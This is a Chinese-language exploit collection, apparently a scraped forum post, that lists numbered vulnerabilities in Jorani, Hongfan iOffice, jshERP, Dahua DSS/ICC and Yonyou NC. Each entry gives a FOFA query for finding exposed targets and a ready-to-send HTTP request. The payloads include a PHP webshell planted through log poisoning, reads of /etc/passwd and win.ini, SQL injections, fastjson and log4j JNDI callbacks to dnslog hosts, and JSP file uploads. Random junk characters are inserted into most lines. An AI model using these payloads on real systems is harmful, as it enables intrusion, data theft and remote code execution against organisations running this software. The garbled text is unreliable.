5 [- B, q# h4 |$ ?- @& WHost: 127.0.0.1+ ?3 D5 S: x: |( u! v3 ^
Pragma: no-cache) B2 B; f7 N3 I3 l# n/ p
Cache-Control: no-cache
6 L( n6 c) D' N4 W1 c/ X: [Upgrade-Insecure-Requests: 1
/ h# H$ s1 U! r& JUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
5 h2 J. C9 P9 g5 O! U3 K& }$ \Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.71 M2 b- x+ L1 C1 Z# M w4 Y
Accept-Encoding: gzip, deflate, v9 ^* u+ D8 g7 g
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8* R, q4 ]" R2 q8 j7 B( ?0 o
Connection: close- Y* [, o- n+ d$ ]
9 M$ u3 q5 X: R# t* ~$ t
# ?% Q" ], f# C, B12. Jorani < 1.0.2 远程命令执行
2 J( s- ?) h4 o5 g! UFOFA:title="Jorani"
N/ E: Z5 Z( R' Q9 i$ C第一步先拿到cookie
& N2 l8 d; _6 h% ~) kGET /session/login HTTP/1.1
- \; m8 v7 }: e+ KHost: 192.168.190.30
" I/ E2 X3 W. C" H$ U i7 sUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36) d+ n0 @- |! k9 r4 I% G, C
Connection: close! ]( w; }- _3 e/ J6 l8 l- }2 t2 {
Accept-Encoding: gzip, E m, [3 X( f1 M5 L* F' z
( `" |) w8 P p6 d" k6 |
" z0 u/ B: L7 V9 S5 [ A: B响应中csrf_cookie_jorani用于后续请求- L! n4 N4 M3 e4 H/ L$ f( t& J
HTTP/1.1 200 OK
) {5 `, r6 v0 b" p) r) K) HConnection: close
/ i' M2 T, l; a4 Q+ K$ sCache-Control: no-store, no-cache, must-revalidate
- g8 n& P9 o' C8 x4 A' a( R4 vContent-Type: text/html; charset=UTF-8
3 _2 k7 Q* b6 |: b+ M- _0 cDate: Tue, 24 Oct 2023 09:34:28 GMT
& Z0 Y# e5 P& H6 E; ?! u5 kExpires: Thu, 19 Nov 1981 08:52:00 GMT
, |' F' D& |) O' kLast-Modified: Tue, 24 Oct 2023 09:34:28 GMT- H4 I- g3 z) ^/ O( `
Pragma: no-cache
9 @* l0 s8 B! f! N( M; g* xServer: Apache/2.4.54 (Debian)2 c6 U/ q8 x* z7 g1 j
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/6 s4 l9 t3 e8 w7 u5 ^# F
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
5 `. g/ J6 H0 \1 h, T2 {# w2 M* NVary: Accept-Encoding
) D" G+ R9 L5 J3 o- m- k9 B( {+ j( ^0 V1 b2 a& |
! x: J5 T- v4 ?7 SPOST请求,执行函数并进行base64编码
- ?/ C" v; ?0 Z' UPOST /session/login HTTP/1.1- X- Y1 g, w- A0 g
Host: 192.168.190.30
$ e( w2 m( Z8 e; H ?6 qUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.362 F$ B7 @5 P7 @) G. e7 n
Connection: close: M0 E- Y7 u& f6 V( o6 }5 s
Content-Length: 252
" v6 ?1 s* d/ l8 L- Q/ p9 t4 lContent-Type: application/x-www-form-urlencoded
l6 g; w% L0 [1 I4 O& yCookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r& R$ i- G7 [8 s7 i5 c
Accept-Encoding: gzip7 A9 c1 p2 z- v* S5 t0 A- N
* q( }' [1 R* G/ C( f
csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor0 T% M0 j$ o, N& V2 w, v" \# z
. d0 ~' ^& ^* g# s; w) Z8 X
5 v2 e! @6 k1 S0 R+ p8 h& r1 d) Z, |: n+ I( _. s
向靶场发送如下请求,执行id命令,请求头中的ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=是命令base64编码后的字符串$ s5 t8 H- s% o+ z
GET /pages/view/log-2023-10-24 HTTP/1.1
+ T _3 E7 M* _( wHost: 192.168.190.30% i Z8 d. {+ I% P# ]( A9 P& Z" f
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
; |$ }0 e% L# _5 iConnection: close
0 I( S; _# r" \) e, o4 Z% ?5 LCookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; c9 V) @1 X. g5 M( [
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=3 ^; H9 O! g+ i& e5 ~9 i, x6 ^6 O
X-REQUESTED-WITH: XMLHttpRequest+ ?% S! D' m1 b# u* ^* d% q- E
Accept-Encoding: gzip/ s% W: p9 m% O$ \6 F, b
" C% P) s/ k% f! s0 g9 u7 ^
2 U% Y3 {" ~3 L! [) U4 R13. 红帆iOffice ioFileDown任意文件读取
) g6 D k; o1 _FOFA:app="红帆-ioffice", ~; t- y/ o( H3 H% S
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1! W, s5 C7 Z, c+ b, r- z
Host: x.x.x.x
: N2 f- x7 W* ], [* I5 Z% wUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.364 q3 |, a! D: n, q
Connection: close
7 a, T& s# [2 l: V6 H1 p0 ^+ _Accept: */*7 o: w- [6 }9 ~4 X1 [
Accept-Encoding: gzip
. C( Z( Z5 ^7 P! ~
Y# l9 j9 G# V6 J/ \
" ]5 L: ~. i( p8 [( K14. 华夏ERP(jshERP)敏感信息泄露
" J" c Q+ c* Y+ @! S/ T$ mFOFA:body="jshERP-boot"
1 R( U" D+ C. b7 X, o泄露内容包括用户名密码% N' b# I: S( r* ?8 _& Z
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1( |2 h2 G# o3 O! c
Host: x.x.x.x- m$ M6 v$ F; w* J, }5 p
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
) b$ }3 \4 r% [. R: oConnection: close- l y) ~8 q Q' q( _7 c7 |" c
Accept: */*
& V0 {% ~5 s8 D; ?Accept-Language: en
' k3 W+ E6 [2 [6 ]9 vAccept-Encoding: gzip
; Z, S, V0 T, Y1 r4 g4 z0 i3 G5 N* p1 l7 j: O! S; C' A5 m
) w! P$ n, L* E+ s/ Y. {15. 华夏ERP getAllList信息泄露
" C6 o1 ]) C. [! ?9 b4 }( k; W7 ~CVE-2024-0490% w$ i. f5 e) m' u2 b9 x5 O6 ~, M
FOFA:body="jshERP-boot". M7 [* g! Y3 r) e$ i
泄露内容包括用户名密码
( G; ^% r" j9 |! s& Y' ~7 k5 F2 [GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
' [2 f; i. h# y8 r9 gHost: 192.168.40.130:100
+ R3 I" Z) f+ _ r1 mUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.362 Q9 p9 p0 }0 F1 j8 r
Connection: close7 C7 X0 d1 C2 d0 k0 b* |1 |
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.80 a" L3 R/ x6 N0 I$ N
Accept-Language: en
8 g1 o# m& {( U) N/ nsec-ch-ua-platform: Windows
9 D! s/ d k* t( M1 U6 Q6 AAccept-Encoding: gzip
: A9 T/ X7 z' U/ ~7 A+ o$ n4 `; r2 _2 B% |( L: J* J7 l6 ?+ g3 w) W
* j$ I- R) e( t
16. 红帆HFOffice医微云SQL注入
& C" r" a6 F7 d9 G% T( R0 I3 q% g) VFOFA:title="HFOffice", ^% J4 u' o7 Y- i/ c* c I* r; C L5 p
poc中调用函数计算1234的md5值( o- L; P+ M6 K" j& J! T, m
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
) x- i1 Z+ n% r- T& i8 M Q2 kHost: x.x.x.x: W5 Q3 S8 r* T
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
0 X h4 H. l, `' [" z, ]; }Connection: close
' m# H8 B5 a) tAccept: */*# S1 h% q) M7 o; ?6 C2 F# A( G7 S
Accept-Language: en
: ]. t: p5 U' c: k7 y% nAccept-Encoding: gzip
# r. U& E8 p9 o( _, m! V C" C
% p3 X9 t5 _ {/ p% }& |
. t# v9 n8 a: ^; W, Z17. 大华 DSS itcBulletin SQL 注入0 c% s; o7 L5 l, U
FOFA:app="dahua-DSS"
; L5 Y7 `' E' R8 P# F& ^2 |; Z$ sPOST /portal/services/itcBulletin?wsdl HTTP/1.1
5 S3 G- B+ @. k vHost: x.x.x.x
3 D. |! j% G$ o+ Y2 v/ g4 aUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.157 m- A, H3 K8 S, ~! f
Connection: close
8 X3 A% `8 x' CContent-Length: 345' A! u* O" j' Y
Accept-Encoding: gzip
. i+ R& \8 H+ P; T( U
: m. o8 ` R: X( ]6 w<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>* z2 Q, x& B# g4 B
<s11:Body>
2 w ]7 {# Z6 Z2 Q4 V# i0 T' x; T <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>" p) J. _4 `+ A4 _1 q) N
<netMarkings>7 @/ M1 a0 U9 V4 i3 h2 ?
(updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=15 _4 Q i0 ?# \
</netMarkings>
, L0 u! U" D2 [1 e7 b. C </ns1:deleteBulletin>; M. I, k( C$ R9 c; N
</s11:Body>
2 K s. q& ~6 n) ~: K</s11:Envelope>+ w, c t* c7 |& `0 x: }
4 H9 U- @- j% i e$ P7 Y( Q* u! J% n/ w3 ^9 [" t
18. 大华 DSS 数字监控系统 user_edit.action 信息泄露
: g7 F! x; H; N" G. nFOFA:app="dahua-DSS"- `) o0 p8 r) J, Q# Q) E
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1# k" g O! S+ u) H/ x# s
Host: your-ip
0 }: [/ a5 {8 KUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.365 @- R7 d+ f4 K+ O5 v
Accept-Encoding: gzip, deflate
4 P) z. Z* `. ?! K: z& d/ YAccept: */*& G! H1 f" y8 O# x
Connection: keep-alive
0 o. P0 A) Z9 _& S' L# }$ J
# y% g1 f. A( t
- Z; E9 @9 ^ \9 b" ^! I4 y
' Y" B& i8 [3 s; ?1 o3 y19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入$ U' Q' v5 t9 r3 P) t9 Z
FOFA:app="dahua-DSS"( |% s, h$ v$ r. C Q* V8 K2 ~& A* P, M
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
* D) A* {- B W' a2 Y7 I5 YHost:
8 W7 z8 N+ L9 }& p- A# uUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36" D. C+ z: ]9 Q9 m4 P# Q
Accept-Encoding: gzip, deflate
* P$ s6 K) R$ i4 [. W9 @+ a0 w. lAccept: */* h% f: f# |/ J- n% u8 u/ }9 L
Connection: keep-alive
; P3 h7 R* y, O2 Q- U
1 F" _1 i. D' @- O: C0 |( t( F9 Y& i6 E' ^
20. 大华ICC智能物联综合管理平台任意文件读取
2 S" S5 R) s9 @) K: M+ |FOFA:body="*客户端会小于800*"% a2 @5 b5 X) w8 u! H& e" r- d
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.10 W$ A- F5 q& w" a/ [5 j, y6 l, @
Host: x.x.x.x
8 h# ~% h" O0 t, z8 W) G) c. S1 xUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
, W z! E) a* U+ V' [Connection: close
8 O$ O0 N7 N3 `" `Accept: */*
' N" K) R: J' NAccept-Language: en
! y! L7 E* O* L* hAccept-Encoding: gzip
& o* F& ?; p9 ~0 d! x( D6 ]2 v2 O0 s0 n. B
/ u: O! Y4 n( E% {6 }. |
21. 大华ICC智能物联综合管理平台random远程代码执行. Y4 W2 z# W9 R& x! |. o
FOFA:icon_hash="-1935899595"/ P( A1 [* d. g6 N" @$ A9 D
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
. E# o) ]: m/ L* M& s. q" ?/ JHost: x.x.x.x( N0 h4 w/ ?' s X2 c# U3 ]' X ^) O
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
4 y, u% l0 |# m- NContent-Length: 161
. c' Q2 t3 F7 y) e) V$ I/ p [Accept-Encoding: gzip
8 Y% O6 l, ^8 w$ I' YConnection: close
, Q7 L5 S G! D4 Z; mContent-Type: application/json;charset=utf-8
3 S9 \3 A8 i8 c6 C2 }7 ?) O5 c" d" e1 p$ `5 d2 q' K
{
' b8 y+ g! T) [6 a U" j"a":{
, v; M* u2 V/ v5 g( f% l "@type":"com.alibaba.fastjson.JSONObject",; ?" W5 R& p, Z0 w
{"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
/ Z. \9 e- F; _* J( p }""9 i' v# j) M' G0 _) ~
}
" U+ v/ E% N0 M8 B
# v0 L" W' o9 \6 A4 T0 t
7 n+ M0 @& f& `+ v- m) p9 v0 `5 a22. 大华ICC智能物联综合管理平台 log4j远程代码执行. Q' Q2 b$ `1 p- o
FOFA:icon_hash="-1935899595"
/ R! ?: ?9 J( tPOST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
; x- @, E' n# `1 g/ EHost: your-ip* w' w! @" a1 Z8 w
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.367 k- C$ R2 k( g7 z
Content-Type: application/json;charset=utf-8
( b I, F S+ \% R3 S( P" w5 Y$ `+ B
{
7 v$ T( j1 ]2 c$ S' _"loginName":"${jndi:ldap://dnslog}"8 q* y$ P. Z' C* Q& G; W; B
}( h$ A2 C" ~" V( H. f/ u
; ], `: H! o9 V6 R9 k; u
* \6 [$ s' H. S! w. u( L# o* n
1 w3 i& K4 z0 @$ k; l! U3 D
23. 大华ICC智能物联综合管理平台 fastjson远程代码执行
( j+ `3 u; z6 J f3 uFOFA:icon_hash="-1935899595"
& u" F b- e& l9 c- }POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.10 ]! ^$ ^. ]/ V1 \2 l( D3 {5 a3 }
Host: your-ip
( `6 X$ J' S: y* D% h8 JUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
- z9 K* Q# f% A9 T3 RContent-Type: application/json;charset=utf-8
( N- O" [5 [( y; w0 I3 bAccept-Encoding: gzip. ~$ u6 {# v1 I
Connection: close
; d$ k _4 i' D! g* _4 [; _, `" e
0 C9 \" U" |9 U{
4 b N7 j, @. ? "a":{
! T# ~* P& C0 q/ J "@type":"com.alibaba.fastjson.JSONObject",
' F; L% a" }: b8 N; y3 C {"@type":"java.net.URL","val":"http://DNSLOG"}
+ t J% f+ \6 j! Q/ R5 o4 G1 n }""; {$ m0 n, X( i" m, c
}
! ^! |4 R, l6 `2 d8 @: i' K2 D
# [2 w% c; {& {2 O, r8 ~4 l' D5 O2 O- b+ t7 \
24. 用友NC 6.5 accept.jsp任意文件上传
+ n4 n3 n4 T6 K% j3 v6 ~FOFA:icon_hash="1085941792"
+ M& o9 I1 u" V+ x6 D; y0 m8 oPOST /aim/equipmap/accept.jsp HTTP/1.1
9 |0 a* f9 |- U! u* g' uHost: x.x.x.x
% N* N% _2 B4 G& d4 W- p2 z2 Z' jUser-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36( s5 u( Q5 k6 m
Connection: close
* t. i+ N. z9 b" ZContent-Length: 449
: j4 ^) }: z- }* h& a3 hAccept: */*
& P0 C+ V4 H) U) K( HAccept-Encoding: gzip+ h- |6 h( ^8 v( R& M a
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
1 x; h U' s- Z. t
& C% Y* T! z9 [# h2 Q7 L+ v-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
7 L# ?# B% A7 `5 S; tContent-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
9 ]; O- t& E" q1 [8 D# ~Content-Type: text/plain: d) w' m' B/ ^7 |( \8 H
2 W0 b# N' Z, x4 {# a4 }1 C4 E7 c
<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>; v+ z" n& K! P: O R& b Y% X- a7 W
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc x! Q" z7 Z |9 x+ _
Content-Disposition: form-data; name="fname"* K8 o+ q0 U8 l
- `3 k! o0 \' \' x7 n0 H\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp' b4 e5 Q+ u# r, ]/ R- ?" B+ Q
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--$ W# g; c3 S4 M; h% {
3 s7 f5 I3 H* { w/ Y4 l
, m& d8 ^; I' D" O9 ^& ?25. 用友NC registerServlet JNDI 远程代码执行
; @+ E; u% Y% f9 _FOFA:app="用友-UFIDA-NC"
+ ]! x9 b! |' H4 K! w: NPOST /portal/registerServlet HTTP/1.1% f3 e2 |: _. z% F+ y
Host: your-ip( F! T7 b8 {/ Z: i0 N
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0$ }; `( j8 Q3 U: @* _
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9: P$ X) v& r- g! f; N% k0 q, Q
Accept-Encoding: gzip, deflate
) B: E, a" q. A' E9 r/ b% \ KAccept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
- I1 v( w0 S/ Z* W& Z2 lContent-Type: application/x-www-form-urlencoded& d, y2 k$ D- `/ R7 D w( a
' K$ C& C* g2 ]6 c) otype=1&dsname=ldap://dnslog
" L+ T7 T* M K3 W( i4 A! n* f- o5 G; U$ m i" G6 C
& U4 @* [/ I, T) Q
. @8 A; H0 W& J0 j5 d% ~26. 用友NC linkVoucher SQL注入' [: v# |5 X8 _- p& _8 H, _
FOFA:app="用友-UFIDA-NC"
% { P' S9 u0 {6 X r' @' yGET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
% J5 f/ Y3 g# n4 \* J& v( QHost: your-ip) B8 B" @8 l, r4 A7 E) t# w- Y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
4 g, r4 H! _, `5 P qContent-Type: application/x-www-form-urlencoded3 J5 U/ J% z# z3 o y7 [
Accept-Encoding: gzip, deflate) ?& v7 k3 o' i5 m; O& f! [9 F& t$ Z
Accept: */*
* L( W) V' [) n% {3 s+ VConnection: keep-alive2 { p3 R" K! P! d/ v7 e
! U/ t$ K- x$ n% \# {" ~, p2 G
2 H& k- z/ E8 c( ]: o4 w5 [27. 用友 NC showcontent SQL注入9 O% g; p: f! O R
FOFA:icon_hash="1085941792"; l' g' K H1 P w5 Z M
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.16 W/ r% n# w7 f
Host: your-ip! D7 f l" m' B; R/ `
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
) S9 N: W, b% z1 K5 sAccept-Encoding: identity
. H$ j4 g2 }9 O0 a- a4 IConnection: close
' a: e, B9 r8 W& j, E! d( X% }Content-Type: text/xml; charset=utf-8
" A8 W5 t" n7 h4 H3 B: o" Q9 V; ~ w6 s7 v2 A7 Y. r; z- b0 _' Y
* p ?" o& H t28. 用友NC grouptemplet 任意文件上传
7 Z9 M$ v# R5 w8 o" {3 f! j. RFOFA:icon_hash="1085941792"
. Z1 v1 k$ P- S- b: Z3 n4 pPOST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.11 u) i/ ^- [- u1 |* p3 `
Host: x.x.x.x
( G9 ?5 g4 @# L) A+ l, VUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
9 G5 d2 d5 i7 J0 p) ^" @Connection: close9 m+ `) \4 A9 I8 O8 R
Content-Length: 268
6 m' u: X. i& u' \% \6 nContent-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
8 H+ \- E) E- T$ l. E: CAccept-Encoding: gzip1 L$ {' v8 g( v/ C& {4 G
- I8 l& s# p+ [) i- U3 |+ V------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk. T- v' s* l& p5 @3 Y* S0 x& I
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"0 q/ C/ \! k( P& d: |# H
Content-Type: application/octet-stream
) p; [- N# G8 u
4 i% t6 \' ], J# ^<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>% S* F* {" `- B2 B: v
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--
2 g' y+ x; g# j. m% n9 ~& A% o7 o; {7 i" C1 n
+ p) G( {9 q7 n
/uapim/static/pages/nc/head.jsp
1 o* \ i0 G$ X2 c' c. n
% t, H' Q, v; A3 H" {29. 用友NC down/bill SQL注入, F5 a) d- x: z" q& E: I
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
+ d. t; b- Y- ZGET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1) M+ w$ q7 \( w, m
Host: your-ip
5 v& y M5 v( ^ b$ V. \, MUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
9 r" z: R/ b k$ D) |Content-Type: application/x-www-form-urlencoded0 `& i! D7 q1 E+ ^$ h" b" w
Accept-Encoding: gzip, deflate, N7 ~( H3 v6 V8 ?+ r
Accept: */*
/ |, X1 I3 x% T! _2 e6 `Connection: keep-alive
' s% h8 o+ R& }! G$ V+ B A6 Q+ a% W( g( Z
8 n1 a, ?: j3 Y s30. 用友NC importPml SQL注入
+ E2 w8 ?. |5 C( q- JFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"3 t- U6 s( ^5 V9 r
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
6 f) @# |) y# ^Host: your-ip2 ^8 u( U2 j# T: A% H! { f
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
: ?7 h1 D- g+ U9 C bUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
4 ^5 r9 U! Q: W+ a) y# y1 BConnection: close
7 ^, T: i# @1 E6 V% W8 z! C% L* n$ A1 W% L
$ ~* e8 w( ]8 M* Z& v4 [------WebKitFormBoundaryH970hbttBhoCyj9V
9 P! ]5 `& _/ n$ \Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
! i& i. [" c' V4 Y( {Content-Type: image/jpeg
$ d5 _5 y+ l" C" G0 l+ L; s------WebKitFormBoundaryH970hbttBhoCyj9V--
# d' Y: V4 P/ e( f7 t! v# e
, r" B( m! f0 _: F% n+ P
( [! b' s. l$ _; U3 |% H31. 用友NC runStateServlet SQL注入* \! o* [$ g4 R& p) d
version<=6.5
0 [: I' u- O e4 JFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"4 g' j6 w6 l8 b/ c4 E
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
2 U/ C# y) t1 n% c. FHost: host
0 s0 N! U1 M% W+ d1 N0 d$ UUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
5 v! O: ~( B: G0 S* BContent-Type: application/x-www-form-urlencoded) R @1 L+ n- D2 n
" j" o0 Y5 d; L7 _3 _ M! c* G
8 d8 c. H' h3 i1 c* p' m32. 用友NC complainbilldetail SQL注入
" v8 `) [ g, n3 ?7 x4 c! |$ M Lversion= NC633、NC65
: D$ x% c) Y% h5 l. N0 iFOFA:app="用友-UFIDA-NC"
4 L) k' ~. P1 a( }' _( mGET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
( M- O" C7 W7 SHost: your-ip
2 A9 N0 d/ l G; B: e* hUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36, I2 h6 d4 v6 R% m2 g. X; f/ {. K; D4 x
Content-Type: application/x-www-form-urlencoded
. I) T+ M# T {( j8 wAccept-Encoding: gzip, deflate
+ s$ p7 g- |6 J: I* u( kAccept: */*( S& W" s5 u* g
Connection: keep-alive4 u+ x3 S2 z- E( t3 K8 N
* C* L: h. f# n# a3 o0 p
& T& m0 E- G$ _+ I3 s0 J33. 用友NC downTax/download SQL注入
0 u9 Y6 l+ }3 l+ ?" x5 fversion:NC6.5FOFA:app="用友-UFIDA-NC"" M8 S2 [/ J3 q8 g+ ^3 d' g, Y
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1) D! t4 c; N. O9 R6 u
Host: your-ip
* ^2 M/ V: |! K- L" _User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.363 B9 ^! m W l _' p
Content-Type: application/x-www-form-urlencoded, u0 F: J5 Z5 O: N: t5 _% F9 m
Accept-Encoding: gzip, deflate
, E) L; j8 E7 d* K7 X; r) aAccept: */* @4 @! e( {* p1 f6 ^0 R. Z$ @
Connection: keep-alive8 b. r& P% p$ x9 U
( E& b: E2 t& P1 R! w; D
6 s( a8 G+ f) g: [34. 用友NC warningDetailInfo接口SQL注入
: y* b9 A* l# W8 e0 t* Q' nFOFA:app="用友-UFIDA-NC"
5 `/ c h" `8 n& s" vGET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
8 j. D# T6 l' B9 e/ c0 h( O, k8 f3 tHost: your-ip- T k' u8 t3 d2 T
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36* b6 a6 } N o+ w1 v) [, S
Content-Type: application/x-www-form-urlencoded
]7 z: i0 \1 h2 X6 S$ cAccept-Encoding: gzip, deflate( u6 t8 O" O2 e8 Q& m
Accept: */*# p+ S% B' k- T2 A) [! n
Connection: keep-alive
# @2 f6 e* J) J2 c
8 j0 S- t1 t3 X" y- K6 a! Z" {' e1 e/ J3 [/ f
35. 用友NC-Cloud importhttpscer任意文件上传
+ c, {' Q& j* EFOFA:app="用友-NC-Cloud"
